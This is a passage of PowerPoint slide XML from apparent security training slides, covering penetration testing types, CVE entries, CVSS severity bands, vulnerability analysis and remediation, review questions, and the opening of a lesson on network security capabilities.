                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947A3E86-66B1-FCE1-C3AC-667621E56467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484312" y="1600201"/>
            <a:ext cx="4895055" cy="4972050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration tests also excel at identifying vulnerabilities associated with improper configurations or weak security policies. While automated scanning methods provide critical vulnerability data, penetration testing provides a deeper and more comprehensive analysis of an organization’s security posture.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Unknown environment (previously known as black box) testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Known environment (previously known as white box) testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Partially known environment (previously known as gray box) testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Bug Bounties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Auditing</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{191B1D58-F684-B2FC-5735-47760E840480}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6607175" y="2807989"/>
            <a:ext cx="4895850" cy="2842221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277189219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C2F3-93D0-3381-AEB6-C00239A5B5B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity: Vulnerability Identification Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{304ECDD5-8674-3CFC-BAA6-84D5CACD8143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You have received an urgent threat advisory and need to configure a network vulnerability scan to check for the presence of a related CVE on your network. What configuration check should you make in the vulnerability scanning software before running the scan?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your CEO wants to know if the company’s threat intelligence platform makes effective use of OSINT. What is OSINT?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A small company that you provide security consulting support to has resisted investing in an event management and threat intelligence platform. The CEO has become concerned about an APT risk known to target supply chains within the company’s industry sector and wants you to scan their systems for any sign that they have been targeted already. What are the additional challenges of meeting this request, given the lack of investment?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95553059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04C4F-9E12-794B-5F4E-CDC3F216E5ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 8D - Vulnerability Analysis and Remediation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A42F77F2-58F0-1031-0739-3F23C834E379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484312" y="2273300"/>
            <a:ext cx="5227638" cy="3771899"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability analysis and remediation are critical stages in vulnerability management. Vulnerability analysis involves evaluating vulnerabilities for their potential impact and exploitability. This process might consider factors such as the ease of exploitation, the potential damage from a successful exploit, the value of the vulnerable asset, and the current threat landscape.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Common Vulnerabilities and Exposures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common Vulnerabilities and Exposures (CVE) is a dictionary of vulnerabilities in published operating systems and applications software (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>cve.mitre.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>). There are several elements that make up a vulnerability’s entry in the CVE:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An identifier in the format: CVE-YYYY-####, where YYYY is the year the vulnerability was discovered, and #### is at least four digits that indicate the order in which the vulnerability was discovered.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A brief description of the vulnerability.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A reference list of URLs that supply more information on the vulnerability.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The date the vulnerability entry was created</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Score 	Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0.1+	Low</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4.0+	Medium</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>7.0+	High</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>9.0+	Critical</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 650">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96B1876E-F2EB-994B-0CE3-71E375179134}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6853918" y="2770006"/>
            <a:ext cx="4895850" cy="2513194"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31201600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D6CD-C382-E4C7-62FA-75752CF25539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>False Positives, False Negatives, and Log Review</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 656">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D48A5CC-96E5-F826-0A35-23A4A8863F0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845240" y="2206171"/>
            <a:ext cx="9296854" cy="4209143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26603728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EB4C-7D10-882C-BC43-BB785DE3D18B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484311" y="0"/>
            <a:ext cx="10018713" cy="1752599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Vulnerability Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{500982E4-70CD-D205-4014-278FD47D1CFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484310" y="1295401"/>
            <a:ext cx="10018713" cy="5429250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="2">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability analysis is critical in supporting several key aspects of an organization’s cybersecurity strategy, including prioritization, vulnerability classification, considerations of exposure, organizational impact, and risk tolerance contexts.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prioritization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Classification</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exposure Factor</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impacts</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Environmental Variables</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Risk Tolerance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Vulnerability Response and Remediation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Remediation Practices</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Patching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cybersecurity insurance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Segmentation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compensating controls </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exceptions and exemptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Re-scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Audit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verification </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>REPORTING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10060922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DA8B1-6248-D57E-287B-C9BC69A212A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity: Vulnerability Analysis and Remediation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FE6BD0A-A6B7-A3FB-259F-296482650D2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is a dictionary of vulnerabilities in published operating systems and applications software.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A vulnerability scan reports that a CVE associated with CentOS Linux is present on a host, but you have established that the host is not running CentOS. What type of scanning error event is this?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This type of protection can provide financial protection in case of a security breach resulting from a vulnerability.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16699199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14322-7350-3E2F-AC1C-FEBBA72DC462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484311" y="-133350"/>
            <a:ext cx="10018713" cy="1752599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson 8 - Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68005589-CFFC-5C67-F49D-200C316E836D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1809750" y="1162050"/>
            <a:ext cx="9693273" cy="5695949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Guidelines for Performing Vulnerability Assessments</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Follow these guidelines when you consider the use of security assessments:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify the procedures and tools that are required to scan for vulnerabilities. This might mean provisioning passive network scanners, active remote or agent- based network scanners, and application or web application scanners.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Develop a configuration and maintenance plan to ensure updates to vulnerability and threat feeds.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run scans regularly and review the results to identify false positives and false negatives, using log review and additional CVE information to validate results if necessary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Schedule configuration reviews and remediation plans, using CVSS vulnerability criticality to prioritize actions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider implementing threat analysis platforms, monitoring advisories and bulletins for new threat sources.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider implementing penetration testing exercises, ensuring that these are set up with a clear project scope.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120092949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020A-3682-87AA-6B10-A3C474713806}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson 9 - Evaluate Network Security Capabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1367E14-1639-B4F8-9695-A63DF6762DC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2095500" y="2133600"/>
            <a:ext cx="9409112" cy="4591050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>LESSON INTRODUCTION</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
